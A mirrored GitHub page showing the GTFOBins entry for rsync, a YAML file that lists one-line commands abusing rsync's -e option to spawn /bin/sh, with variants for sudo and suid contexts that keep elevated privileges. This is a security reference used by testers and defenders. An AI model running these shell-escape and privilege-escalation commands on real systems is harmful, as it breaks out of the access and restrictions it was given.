1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/rsync
2026-02-04 13:10:17 +01:00

14 lines
251 B
Plaintext

---
functions:
shell:
- code: |-
rsync -e '/bin/sh -c "/bin/sh 0<&2 1>&2"' x:x
contexts:
sudo:
suid:
code: |-
rsync -e '/bin/sh -p -c "/bin/sh -p 0<&2 1>&2"' x:x
shell: false
unprivileged:
...